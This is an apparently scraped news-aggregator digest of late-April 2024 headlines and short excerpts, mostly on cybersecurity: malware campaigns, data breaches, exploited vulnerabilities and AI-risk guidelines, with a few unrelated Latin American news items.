          The U.S. government has unveiled new security guidelines aimed at bolstering critical infrastructure against artificial intelligence (AI)-related threats. "These guidelines are informed by the whole-of-government effort to assess AI risks across all sixteen critical infrastructure sectors, and address threats both to and from, and involving AI systems," the Department of Homeland Security (DHS)

          Autosummary: Specifically, this spans four different functions such as govern, map, measure, and manage all through the AI lifecycle: establish an organizational culture of AI risk management; understand your individual AI use context and risk profile; develop systems to assess, analyze, and track AI risks; prioritize and act upon AI risks to safety and security. "Critical infrastructure owners and operators should account for their own sector-specific and context-specific use of AI when assessing AI risks and selecting appropriate mitigations," the agency said.


          Meta faces EU probe over Russian disinformation

          rusia-ucrania
          2024-04-30 https://www.bbc.com/news/articles/c72p1dr0mk8o
          The EU says Facebook and Instagram have not done enough to combat "malicious actors’" political ads.


          Google now pays up to $450,000 for RCE bugs in some Android apps

          exploits
          2024-04-30 https://www.bleepingcomputer.com/news/security/google-now-pays-up-to-450-000-for-rce-bugs-in-some-android-apps/
          Google has increased rewards for reporting remote code execution vulnerabilities within select Android apps by ten times, from $30,000 to $300,000, with the maximum reward reaching $450,000 for exceptional quality reports. [...]


          Millions of Docker repos found pushing malware, phishing sites

          financial exploits
          2024-04-30 https://www.bleepingcomputer.com/news/security/millions-of-docker-repos-found-pushing-malware-phishing-sites/
          Three large-scale campaigns have targeted Docker Hub users, planting millions of repositories designed to push malware and phishing sites since early 2021. [...]

          Autosummary: The "Downloader" and "eBook Phishing" campaigns created fake repositories in batches, while the "Website SEO" campaign created a few repositories daily and used a single user per repository.


          New Wpeeper Android malware hides behind hacked WordPress sites

          exploits
          2024-04-30 https://www.bleepingcomputer.com/news/security/new-wpeeper-android-malware-hides-behind-hacked-wordpress-sites/
          A new Android backdoor malware named "Wpeeper" has been spotted in at least two unofficial app stores mimicking the Uptodown App Store, a popular third-party app store for Android devices with over 220 million downloads. [...]


          New Latrodectus malware attacks use Microsoft, Cloudflare themes

          exploits
          2024-04-30 https://www.bleepingcomputer.com/news/security/new-latrodectus-malware-attacks-use-microsoft-cloudflare-themes/
          Latrodectus malware is now being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate while making it harder for email security platforms to detect the emails as malicious. [...]

          Autosummary: [Figure: Solving a fake Cloudflare captcha to download payload (Source: BleepingComputer)] The downloaded JavaScript script is heavily obfuscated with comments that include a hidden function that extracts text from comments that start with "////" and then executes the script to download an MSI from a hardcoded URL, as shown in the deobfuscated script below.


          Colombian military loses millions of bullets

          latam
          2024-04-30 https://www.bbc.co.uk/news/world-latin-america-68931217
          Military personnel have been selling weapons to arms traders, says President Gustavo Petro.


          AI is creating a new generation of cyberattacks

          ciber
          2024-04-29 https://www.helpnetsecurity.com/2024/04/29/offensive-ai-cyberattacks/

          Most businesses see offensive AI fast becoming a standard tool for cybercriminals, with 93% of security leaders expecting to face daily AI-driven attacks, according to Netacea. Offensive AI in cyberattacks: The research, “Cyber security in the age of offensive AI”, surveyed security leaders in the UK and US about their experience with AI as a tool in cybersecurity. It reveals that not only do most security leaders expect daily AI-driven attacks, 65% expect that offensive …

          Autosummary: “The pressure is on security leaders to do more with less, and so the rise of the use of AI to enhance cyber attacks could not have come at a worse time,” said Andy Still, CTO, Netacea.


          Closing the cybersecurity skills gap with upskilling programs

          ciber
          2024-04-29 https://www.helpnetsecurity.com/2024/04/29/tech-skills-gap/

          The list of skills technologists and organizations need to succeed grows with each new tech advancement, according to Pluralsight. But for many organizations, budgets and staff continue to shrink. This survey asked 1,400 executives and IT professionals how organizations can leverage technology to drive business value in a world where budgets and headcount are decreasing and technology is evolving at a rapid pace. Critical skills gaps in organizations: The results were unanimous across markets and … More

          The post Closing the cybersecurity skills gap with upskilling programs appeared first on Help Net Security.

          "

          Autosummary: Critical skills gaps in organizations: The results were unanimous across markets and career levels: cybersecurity, cloud, and software development, which are considered the most imperative tech skills to learn, are the top areas where skills gaps persist. “While we know AI/ML skills are increasingly critical, we’ve also found that organizations have other, more immediate upskilling priorities,” said Aaron Rosenmund, Pluralsight’s Senior Director of Security & GenAI Skills. "


          Anticipating and addressing cybersecurity challenges

          ciber
          2024-04-29 https://www.helpnetsecurity.com/2024/04/29/various-cybersecurity-challenges-organizations-face-video/

          In this Help Net Security round-up, we present excerpts from previously recorded videos in which security experts talk about how increased adoption of cloud technology, remote work, and the proliferation of IoT devices present significant challenges for organizations. To tackle them, cybersecurity professionals are increasingly focusing on incident response, multicloud security, and IoT protection. They also discuss how AI is emerging as a valuable tool, but it presents its own set of problems, emphasizing the … More

          The post Anticipating and addressing cybersecurity challenges appeared first on Help Net Security.

          "

          Autosummary: "


          The Los Angeles County Department of Health Services disclosed a data breach

          financial government
          2024-04-29 https://securityaffairs.com/162494/data-breach/los-angeles-county-department-of-health-services-data-breach.html
          The Los Angeles County Department of Health Services reported a data breach that exposed thousands of patients’ personal and health information. The Los Angeles County Department of Health Services disclosed a data breach that impacted thousands of patients. Patients’ personal and health information was exposed after a phishing attack impacted over two dozen employees. Los […] "

          Autosummary: The compromised information varied for each individual, potentially exposed information included the patient’s first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service, and/or medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "


          Collection agency FBCS warns data breach impacts 1.9 million people

          financial
          2024-04-29 https://www.bleepingcomputer.com/news/security/collection-agency-fbcs-warns-data-breach-impacts-19-million-people/
          Financial Business and Consumer Solutions (FBCS) is warning 1,955,385 impacted individuals in the United States that the company suffered a data breach after discovering unauthorized access to specific systems in its network. [...] "

          Autosummary: "


          UK enacts IoT cybersecurity law

          industry ciber
          2024-04-29 https://www.helpnetsecurity.com/2024/04/29/uk-enacts-iot-cybersecurity-law/

          The Product Security and Telecommunications Infrastructure (PSTI) Act has come into effect today, requiring manufacturers of consumer-grade IoT products sold in the UK to stop using guessable default passwords and have a vulnerability disclosure policy. “Most smart devices are manufactured outside the UK, but the PSTI act also applies to all organisations importing or retailing products for the UK market. Failure to comply with the act is a criminal offence, with fines up to £10 … More

          The post UK enacts IoT cybersecurity law appeared first on Help Net Security.

          "

          Autosummary: About the legislation: The PSTI Act covers internet- and network-connectable products, including smart TVs, streaming devices and speakers; games consoles, smartphones and tablets; base stations and hubs; home automation and alarm systems; and “wearables” such as smart watches and fitness trackers. "


          Silobreaker empowers users with timely insight into key cybersecurity incident filings

          ciber
          2024-04-29 https://www.helpnetsecurity.com/2024/04/29/silobreaker-sec-8-k-incident-filings/

          Silobreaker announced the addition of automatic collection, AI-enhanced analysis, and alerting on 8-K cybersecurity incident filings made to the US Securities and Exchange Commission (SEC). This enhancement to the Silobreaker platform empowers organizations to stay informed about critical cybersecurity incidents affecting US companies. SEC 8-K Item 1.05 mandates that publicly traded companies in the US must disclose ‘material cybersecurity incidents’ within 4 business days of the event. Although designed to enhance investor awareness, SEC 8-K … More

          The post Silobreaker empowers users with timely insight into key cybersecurity incident filings appeared first on Help Net Security.

          "

          Autosummary: "


          New R Programming Vulnerability Exposes Projects to Supply Chain Attacks

          exploits
          2024-04-29 https://thehackernews.com/2024/04/new-r-programming-vulnerability-exposes.html
          A security vulnerability has been discovered in the R programming language that could be exploited by a threat actor to create a malicious RDS (R Data Serialization) file such that it results in code execution when loaded and referenced. The flaw, assigned the CVE identifier CVE-2024-27322, "involves the use of promise objects and lazy evaluation in R," "

          Autosummary: "


          Financial Business and Consumer Solutions (FBCS) data breach impacted 2M individuals

          financial
          2024-04-29 https://securityaffairs.com/162514/cyber-crime/fbcs-data-breach.html
          Financial Business and Consumer Solutions (FBCS) suffered a data breach that exposed the information of 2 million individuals. Debt collection agency Financial Business and Consumer Solutions (FBCS) disclosed a data breach that may have impacted 1,955,385 individuals. FBCS, a third-party debt collection agency, collects personal information from its clients to facilitate debt collection activities on behalf of […] "

          Autosummary: "


          London Drugs pharmacy chain closes stores after cyberattack

          ciber
          2024-04-29 https://www.bleepingcomputer.com/news/security/london-drugs-pharmacy-chain-closes-stores-after-cyberattack/
          Canadian pharmacy chain London Drugs has closed all its retail stores to contain what it described as a "cybersecurity incident." [...] "

          Autosummary: "


          Microsoft fixes bug behind incorrect BitLocker encryption errors

          exploits
          2024-04-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-incorrect-bitlocker-encryption-errors/
          Microsoft has fixed a known issue causing incorrect BitLocker drive encryption errors in some managed Windows environments. [...] "

          Autosummary: "


          FCC fines carriers $200 million for illegally sharing user location

          Telcos
          2024-04-29 https://www.bleepingcomputer.com/news/technology/fcc-fines-carriers-200-million-for-illegally-sharing-user-location/
          The Federal Communications Commission (FCC) has fined the largest U.S. wireless carriers almost $200 million for sharing their customers' real-time location data without their consent. [...] "

          Autosummary: During the investigation, the FCC's Enforcement Bureau found that each of the four mobile carriers sold their customers' real-time location data to "aggregators," who then resold this information to dozens of third-party location-based service providers, revealing where the customers were going and who they were. "


          Week in review: Two Cisco ASA zero-days exploited, MITRE breach, GISEC Global 2024

          exploits
          2024-04-28 https://www.helpnetsecurity.com/2024/04/28/week-in-review-two-cisco-asa-zero-days-exploited-mitre-breach-gisec-global-2024/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) A state-sponsored threat actor has managed to compromise Cisco Adaptive Security Appliances (ASA) used on government networks across the globe and use two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) to install backdoors on them, Cisco Talos researchers have shared on Wednesday. MITRE breached by nation-state threat actor via Ivanti zero-days MITRE has … More

          The post Week in review: Two Cisco ASA zero-days exploited, MITRE breach, GISEC Global 2024 appeared first on Help Net Security.

          "

          Autosummary: Here are a few photos from the event; featured vendors include: Waterfall Security Solutions, Netskope, Google Cloud, Huawei, NetSPI, SecureLink, Cloudflare, IT Max Global, Deloitte, Pulsec, Help AG, Splunk, Netscout, Zscaler, SecurityScorecard, OPSWAT, Ciqur24, toolswatch. "


          Targeted operation against Ukraine exploited 7-year-old MS Office bug

          exploits
          2024-04-28 https://securityaffairs.com/162420/hacking/ukraine-campaign-old-ms-office-bug.html
          A hacking campaign targeted Ukraine exploiting a seven-year-old vulnerability in Microsoft Office to deliver Cobalt Strike. Security experts at Deep Instinct Threat Lab have uncovered a targeted campaign against Ukraine, exploiting a Microsoft Office vulnerability dating back almost seven years to deploy Cobalt Strike on compromised systems. The researchers found a malicious PPSX (PowerPoint Slideshow […] "

          Autosummary: Pierluigi Paganini, April 28, 2024: A hacking campaign targeted Ukraine, exploiting a seven-year-old vulnerability in Microsoft Office to deliver Cobalt Strike. "


          US Post Office phishing sites get as much traffic as the real one

          financial
          2024-04-28 https://www.bleepingcomputer.com/news/security/us-post-office-phishing-sites-get-as-much-traffic-as-the-real-one/
          Security researchers analyzing phishing campaigns that target United States Postal Service (USPS) saw that the traffic to the fake domains is typically similar to what the legitimate site records and it is even higher during holidays. [...] "

          Autosummary: (Image caption: Comparison of total queries between legitimate (left) and malicious domains (right). Source: Akamai.) However, the stats show that traffic to malicious domains between November and December was higher compared to the legitimate one, indicating increased malicious activity during the winter holiday season. "


          ICICI Bank exposed credit card data of 17000 customers

          financial
          2024-04-28 https://securityaffairs.com/162479/security/icici-bank-technical-glitch.html
          ICICI Bank, a major private bank in India, mistakenly exposed the sensitive data of thousands of new credit cards to unintended recipients. ICICI Bank, one of the leading private banks in India, accidentally exposed data of thousands of new credit cards to customers who were not the intended recipients. ICICI Bank Limited is an Indian multinational bank and financial services company […] "

          Autosummary: Pierluigi Paganini, April 28, 2024: ICICI Bank, a major private bank in India, mistakenly exposed the sensitive data of thousands of new credit cards to unintended recipients. "


          Bogus npm Packages Used to Trick Software Developers into Installing Malware

          exploits
          2024-04-27 https://thehackernews.com/2024/04/bogus-npm-packages-used-to-trick.html
          An ongoing social engineering campaign is targeting software developers with bogus npm packages under the guise of a job interview to trick them into downloading a Python backdoor. Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER, linking it to North Korean threat actors. "During these fraudulent interviews, the developers are often asked "

          Autosummary: Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive campaign that sends unsuspecting professionals employed in various sectors like aerospace, cryptocurrency, defense, and other sectors malicious files dressed as job offers to distribute malware. "


          Brokewell Android malware supports an extensive set of Device Takeover capabilities

          exploits
          2024-04-27 https://securityaffairs.com/162381/malware/brokewell-android-malware.html
          ThreatFabric researchers identified a new Android malware called Brokewell, which implements a wide range of device takeover capabilities. ThreatFabric researchers uncovered a new mobile malware named Brokewell, which is equipped with sophisticated device takeover features. The experts pointed out that this malware is actively evolving and poses a severe risk to the banking sector. The […] "

          Autosummary: Brokewell malware supports “accessibility logging”: it records any device events such as touches, swipes, displayed information, text input, and opened applications. "


          Ukraine Targeted in Cyberattack Exploiting 7-Year-Old Microsoft Office Flaw

          exploits ciber
          2024-04-27 https://thehackernews.com/2024/04/ukraine-targeted-in-cyberattack.html
          Cybersecurity researchers have discovered a targeted operation against Ukraine that has been found leveraging a nearly seven-year-old flaw in Microsoft Office to deliver Cobalt Strike on compromised systems. The attack chain, which took place at the end of 2023 according to Deep Instinct, employs a PowerPoint slideshow file ("signal-2023-12-20-160512.ppsx") as the starting point, with "

          Autosummary: "Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations," Mandiant said, describing the advanced persistent threat (APT) as engaged in a multi-pronged effort to help Russia gain a wartime advantage since January 2022. "


          Japanese police create fake support scam payment cards to warn victims

          financial
          2024-04-27 https://www.bleepingcomputer.com/news/security/japanese-police-create-fake-support-scam-payment-cards-to-warn-victims/
          Japanese police placed fake payment cards in convenience stores to protect the elderly targeted by tech support scams or unpaid money fraud. [...] "

          Autosummary: "


          Hackers may have accessed thousands of accounts on the California state welfare platform

          government
          2024-04-27 https://securityaffairs.com/162408/data-breach/california-state-welfare-platform-accounts-compromise.html
          Threat actors accessed more than 19,000 online accounts on a California state platform for welfare programs. Threat actors breached over 19,000 online accounts on a California state platform dedicated to welfare programs. Officials reported that the security breach occurred on February 9, when someone logged into some BenefitsCal users’ accounts. Threat actors exploited reused passwords […] "

          Autosummary: “In reviewing your account use during that time, your personal information may have been accessed.” According to the data breach notification, potentially compromised information may have included users' name, address, date of birth, full or last four digits of Social Security Number, email address, phone number, EBT card number, case number, Medi-Cal ID number and information about their program eligibility and benefits. "


          Breaking down the numbers: Cybersecurity funding activity recap

          ciber
          2024-04-26 https://www.helpnetsecurity.com/2024/04/26/cybersecurity-funding-2024/

          Here’s a list of interesting cybersecurity companies that received funding so far in 2024. Aim Security January | $10 million Aim Security raised $10 million in seed funding, led by YL Ventures, with participation from CCL (Cyber Club London), the founders of WIZ and angel investors from Google, Proofpoint and Palo Alto Networks. Aim Security was founded by cybersecurity veterans Matan Getz, CEO and Adir Gruss, CTO who pioneered the use and adoption of AI … More

          The post Breaking down the numbers: Cybersecurity funding activity recap appeared first on Help Net Security.

          "

          Autosummary: Permit.io February | $8 million Permit.io raised $8 million in Series A funding, led by Scale Venture Partners, along with NFX, Verissimo Ventures, Roosh Ventures, Firestreak, 92712, and other existing investors, to ensure application developers never have to build permissions again. StrikeReady April | $12 million StrikeReady has received $12 million in Series A funding, led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf; and Rod Beckstrom, former CEO of ICANN and Founding Director of U.S. National Cybersecurity Center (now CISA). "


          Kaiser Permanente: Data breach may impact 13.4 million patients

          financial
          2024-04-26 https://www.bleepingcomputer.com/news/security/kaiser-permanente-data-breach-may-impact-134-million-patients/
          Healthcare service provider Kaiser Permanente disclosed a data security incident that may impact 13.4 million people in the United States. [...] "

          Autosummary: "


          Hackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites

          exploits
          2024-04-26 https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html
          Threat actors are attempting to actively exploit a critical security flaw in the WP‑Automatic plugin for WordPress that could allow site takeovers. The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.9.2.0. "This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as "

          Autosummary: "


          Over 1,400 CrushFTP internet-facing servers vulnerable to CVE-2024-4040 bug

          exploits
          2024-04-26 https://securityaffairs.com/162319/hacking/crushftp-cve-2024-4040-vulnerable-servers.html
          Over 1,400 CrushFTP internet-facing servers are vulnerable to attacks exploiting the recently disclosed CVE-2024-4040 vulnerability. Over 1,400 CrushFTP internet-facing servers are vulnerable to attacks targeting the critical severity vulnerability CVE-2024-4040. CVE-2024-4040 is a CrushFTP VFS sandbox escape vulnerability. CrushFTP is a file transfer server software that enables secure and efficient file transfer capabilities. It supports various features such as […] "

          Autosummary: Pierluigi Paganini, April 26, 2024: Over 1,400 CrushFTP internet-facing servers are vulnerable to attacks exploiting the recently disclosed CVE-2024-4040 vulnerability. "


          Sweden’s liquor supply severely impacted by ransomware attack on logistics company

          exploits ransomware industry
          2024-04-26 https://securityaffairs.com/162333/cyber-crime/swedens-liquor-supply-ransomware-attack.html
          A ransomware attack on the Swedish logistics company Skanlog severely impacted the country’s liquor supply. Skanlog, a critical distributor for Systembolaget, the Swedish government-owned retail chain, suffered a ransomware attack. Systembolaget has a monopoly on the sale of alcoholic beverages containing more than 3.5% alcohol by volume. It operates stores across Sweden and is responsible […] "

          Autosummary: Pierluigi Paganini, April 26, 2024: A ransomware attack on the Swedish logistics company Skanlog severely impacted the country’s liquor supply. "


          New "Brokewell" Android Malware Spread Through Fake Browser Updates

          exploits
          2024-04-26 https://thehackernews.com/2024/04/new-brokewell-android-malware-spread.html
          Fake browser updates are being used to push a previously undocumented Android malware called Brokewell. "Brokewell is a typical modern banking malware equipped with both data-stealing and remote-control capabilities built into the malware," Dutch security firm ThreatFabric said in an analysis published Thursday. The malware is said to be in active development, "

          Autosummary: Some of the other features of Brokewell include the ability to record audio, take screenshots, retrieve call logs, access device location, list installed apps, record every event happening on the device, send SMS messages, make phone calls, install and uninstall apps, and even disable the accessibility service. "


          Kaiser Permanente data breach may have impacted 13.4 million patients

          financial
          2024-04-26 https://securityaffairs.com/162347/data-breach/kaiser-permanente-data-breach.html
          Healthcare service provider Kaiser Permanente disclosed a security breach that may impact 13.4 million individuals in the United States. Kaiser Permanente is an American integrated managed care consortium; it is made up of three distinct but interdependent groups of entities: the Kaiser Foundation Health Plan, Inc. (KFHP) and its regional operating subsidiaries; Kaiser Foundation Hospitals; and the […] "

          Autosummary: It operates in California, Colorado, the District of Columbia, Georgia, Hawaii, Maryland, Oregon, Virginia, and Washington. "


          Experts warn of an ongoing malware campaign targeting WP-Automatic plugin

          exploits
          2024-04-26 https://securityaffairs.com/162364/hacking/wordpress-automatic-critical-flaw.html
          A critical vulnerability in the WordPress Automatic plugin is being exploited to inject backdoors and web shells into websites. WordPress security scanner WPScan warns that threat actors are exploiting a critical SQL injection vulnerability in the plugin WordPress Automatic to inject malware into websites. The premium plugin “Automatic” developed by ValvePress enables users to automatically […] "

          Autosummary: “This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as attackers can exploit it to gain unauthorized access to websites, create admin‑level user accounts, upload malicious files, and potentially take full control of affected sites,” reads the advisory. "


          Fire guts homeless shelter in Brazil killing 10

          latam
          2024-04-26 https://www.bbc.co.uk/news/world-latin-america-68909832
          The blaze erupted in the middle of the night at a guesthouse in Porto Alegre in southern Brazil. "

          Autosummary: "


          Major phishing-as-a-service platform disrupted – Week in security with Tony Anscombe

          financial
          2024-04-26 https://www.welivesecurity.com/en/videos/major-phishing-as-a-service-platform-disrupted-week-security-tony-anscombe/
          The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked victims into handing over their sensitive details "

          Autosummary: "


          Overcoming GenAI challenges in healthcare cybersecurity

          ciber
          2024-04-25 https://www.helpnetsecurity.com/2024/04/25/asaf-mischari-team8-health-genai-healthcare-risks/

          In this Help Net Security interview, Assaf Mischari, Managing Partner, Team8 Health, discusses the risks associated with GenAI healthcare innovations and their impact on patient privacy. What are the key cybersecurity challenges in healthcare in the context of GenAI, and how can they be effectively addressed? The healthcare industry faces many of the same challenges other industries face in the wake of emerging technologies with subtle differences that need to be considered and addressed. For … More

          The post Overcoming GenAI challenges in healthcare cybersecurity appeared first on Help Net Security.

          "

          Autosummary: Historically, healthcare data has many built-in biases when it comes to race, ethnicity, and gender, but bias in GenAI could result from bias in the training dataset, feature selection, data collection, labeling process, or even the model architecture itself. With predictive analytics, healthcare professionals can anticipate patient flow, staffing needs, and resource utilization, enabling proactive decision-making and resource allocation. "


          25 cybersecurity AI stats you should know

          ciber
          2024-04-25 https://www.helpnetsecurity.com/2024/04/25/cybersecurity-ai-stats/

          In this article, you will find excerpts from reports we recently covered, which offer stats and insights into the challenges and cybersecurity issues arising from the expansion of AI. Security pros are cautiously optimistic about AI: Cloud Security Alliance and Google Cloud | The State of AI and Security Survey Report | April 2024 55% of organizations plan to adopt GenAI solutions within this year, signaling a substantial surge in GenAI integration. 48% of professionals … More

          The post 25 cybersecurity AI stats you should know appeared first on Help Net Security.

          "

          Autosummary: Code42 | Annual Data Exposure Report 2024 | March 2024 Since 2021, there has been a 28% average increase in monthly insider-driven data exposure, loss, leak, and theft events. Accenture | Work, workforce, workers: Reinvented in the age of generative AI | January 2024 While 95% of workers see value in working with GenAI, 60% are also concerned about job loss, stress and burnout. "


          State-Sponsored Hackers Exploit Two Cisco Zero-Day Vulnerabilities for Espionage

          exploits government
          2024-04-25 https://thehackernews.com/2024/04/state-sponsored-hackers-exploit-two.html
          A new malware campaign leveraged two zero-day flaws in Cisco networking gear to deliver custom malware and facilitate covert data collection on target environments. Cisco Talos, which dubbed the activity ArcaneDoor, attributed it to a previously undocumented sophisticated state-sponsored actor it tracks under the name UAT4356 (aka Storm-1849 by Microsoft). "

          Autosummary: "It is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors)," according to a joint advisory published by cybersecurity agencies from Australia, Canada, and the U.K. At every phase of the attack, UAT4356 is said to have demonstrated meticulous attention to hiding digital footprints and the ability to employ intricate methods to evade memory forensics and lower the chances of detection, contributing to its sophistication and elusive nature. "


          Google fixed critical Chrome vulnerability CVE-2024-4058

          exploits
          2024-04-25 https://securityaffairs.com/162259/security/google-chrome-critical-flaw.html
          Google addressed a critical Chrome vulnerability, tracked as CVE-2024-4058, that resides in the ANGLE graphics layer engine. Google addressed four vulnerabilities in the Chrome web browser, including a critical vulnerability tracked as CVE-2024-4058. The vulnerability CVE-2024-4058 is a Type Confusion issue that resides in the ANGLE graphics layer engine. An attacker can exploit this vulnerability […] "

          Autosummary: "


          Anatomy IT’s new Security Suite targets healthcare cybersecurity threats, improves incident response

          ciber
          2024-04-25 https://www.helpnetsecurity.com/2024/04/25/anatomy-it-security-suite-expansion/

          Anatomy IT has announced the launch of an expanded end-to-end cybersecurity product suite designed to safeguard healthcare delivery organizations from evolving and growing IT system threats. A record 133 million individuals were affected by healthcare data breaches in 2023, according to Modern Healthcare, a number equivalent to nearly 40% of the U.S. population. Industry observers warn, however, that breaches caused by cyberattacks are likely to increase in 2024 and beyond. Costs associated with cybersecurity incidents … More

          The post Anatomy IT’s new Security Suite targets healthcare cybersecurity threats, improves incident response appeared first on Help Net Security.

          "

          Autosummary: In light of recent events and given this growing threat to patient safety and provider organizations, Anatomy IT is drawing on its three decades of healthcare operational and cybersecurity experience, as well as feedback from its more than 1,000 clients, on this new, broader, forward-looking service offering. "


          Violence forces venue change for Haiti council swearing in

          government
          2024-04-25 https://www.bbc.co.uk/news/world-latin-america-68896323
          Gangs have taken advantage of an almost complete power vacuum to expand their control in the country. "

          Autosummary: "


          Over 1,400 CrushFTP servers vulnerable to actively exploited bug

          exploits
          2024-04-25 https://www.bleepingcomputer.com/news/security/over-1-400-crushftp-servers-vulnerable-to-actively-exploited-bug/
          Over 1,400 CrushFTP servers exposed online were found vulnerable to attacks currently targeting a critical severity server-side template injection (SSTI) vulnerability previously exploited as a zero-day. [...] "

          Autosummary: "


          New Brokewell malware takes over Android devices, steals data

          exploits
          2024-04-25 https://www.bleepingcomputer.com/news/security/new-brokewell-malware-takes-over-android-devices-steals-data/
          Security researchers have discovered a new Android banking trojan they named Brokewell that can capture every event on the device, from touches and information displayed to text input and the applications the user launches. [...] "

          Autosummary: Stealing the victim's credentials (ThreatFabric). Device takeover: allows the attacker to see the device's screen in real time (screen streaming). Tools sold on the threat actor's website (ThreatFabric). The researchers discovered another tool called "Brokewell Android Loader," also developed by Samedit. "


          “Junk gun” ransomware: the cheap new threat to small businesses

          exploits ransomware
          2024-04-25 https://www.tripwire.com/state-of-security/junk-gun-ransomware-cheap-new-threat-small-businesses
          A wave of cheap, crude, amateurish ransomware has been spotted on the dark web - and although it may not make as many headlines as LockBit, Rhysida, and BlackSuit, it still presents a serious threat to organizations. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: Other "junk gun" ransomware examples include Diablo, Evil Extractor, Yasmha, HardShield, Jigsaw, LoliCrypt, and CatLogs. "


          CISA adds Microsoft Windows Print Spooler flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-04-25 https://securityaffairs.com/162295/hacking/cisa-adds-microsoft-windows-print-spooler-flaw-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. CISA added the Windows Print Spooler flaw CVE-2022-38028 to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2022-38028 Microsoft Windows Print Spooler Privilege Escalation vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. CISA added the flaw to the KEV catalog after Microsoft reported that the Russia-linked APT28 group (aka “Forest Blizzard”, […] "

          Autosummary: "


          LA County Health Services: Patients' data exposed in phishing attack

          financial government
          2024-04-25 https://www.bleepingcomputer.com/news/security/la-county-health-services-patients-data-exposed-in-phishing-attack/
          The L.A. County's Department of Health Services, the second-largest public health care system in the United States, disclosed a data breach after patients' personal and health information was exposed in a data breach resulting from a recent phishing attack impacting over two dozen employees. [...] "

          Autosummary: "


          Researchers sinkhole PlugX malware server with 2.5 million unique IPs

          exploits
          2024-04-25 https://www.bleepingcomputer.com/news/security/researchers-sinkhole-plugx-malware-server-with-25-million-unique-ips/
          Researchers have sinkholed a command and control server for a variant of the PlugX malware and observed in six months more than 2.5 million connections from unique IP addresses. [...] "

          Autosummary: Infections of the particular PlugX variant (Sekoia). While the worm spread to 170 countries, just 15 of them account for over 80% of the total infections, with Nigeria, India, China, Iran, Indonesia, the UK, Iraq, and the United States being at the top of the list. "


          CISA adds Cisco ASA and FTD and CrushFTP VFS flaws to its Known Exploited Vulnerabilities catalog

          exploits
          2024-04-25 https://securityaffairs.com/162308/security/cisa-adds-cisco-asa-and-ftd-and-crushftp-vfs-flaws-to-its-known-exploited-vulnerabilities-catalog.html
          CISA adds Cisco ASA and FTD and CrushFTP VFS vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Cisco Talos this week warned that the nation-state actor UAT4356 (aka STORM-1849) has been exploiting two zero-day vulnerabilities in Adaptive Security […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-20353 (Cisco ASA and FTD Denial of Service Vulnerability), CVE-2024-20359 (Cisco ASA and FTD Privilege Escalation Vulnerability), and CVE-2024-4040 (CrushFTP VFS Sandbox Escape Vulnerability). Cisco Talos this week warned that the nation-state actor UAT4356 (aka STORM-1849) has been exploiting two zero-day vulnerabilities in Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023 to breach government networks worldwide. CrushFTP supports various features such as FTP, SFTP, FTPS, HTTP, HTTPS, WebDAV, and WebDAV SSL protocols, allowing users to transfer files securely over different networks. "


          LA County Health Services: Patients' data exposed in phishing attack

          financial government
          2024-04-25 https://www.bleepingcomputer.com/news/security/la-county-health-services-thousands-of-patients-data-exposed-in-email-breach/
          The Los Angeles County Department of Health Services disclosed a data breach after thousands of patients' personal and health information was exposed in a data breach resulting from a recent phishing attack impacting over two dozen employees. [...] "

          Autosummary: Documents and e-mails in the compromised mailboxes included a combination of patients' personal and health information, including: first and last name, date of birth, home address, phone number(s), e-mail address, medical record number, client identification number, dates of service, medical information (e.g., diagnosis/condition, treatment, test results, medications), and/or health plan information. "


          Gripped by Python: 5 reasons why Python is popular among cybersecurity professionals

          ciber
          2024-04-25 https://www.welivesecurity.com/en/secure-coding/python-5-reasons-popular-cybersecurity-professionals/
          Python’s versatility and short learning curve are just two factors that explain the language’s "grip" on cybersecurity "

          Autosummary: Python’s versatility and short learning curve are just two factors that explain the language’s "grip" on cybersecurity The Python programming language, born from the creative genius of Guido van Rossum as far back as some 35 years ago, has evolved into a crucial tool for professionals working in various areas, including software development, data science, artificial intelligence and, notably, cybersecurity. Indeed, Python’s reputation precedes it, and this high-level, general-purpose programming language has become renowned, among other things, for its user-friendliness and a developer community of no fewer than 8.2 million people, as well as an extensive array of tools and libraries. "


          Huge protest in Argentina against education cuts

          latam
          2024-04-24 https://www.bbc.co.uk/news/world-latin-america-68886411
          Thousands marched in Buenos Aires on Tuesday calling on President Milei to preserve university funding. "

          Autosummary: "


          AI set to play key role in future phishing attacks

          financial
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/2024-phishing-attacks-trends/

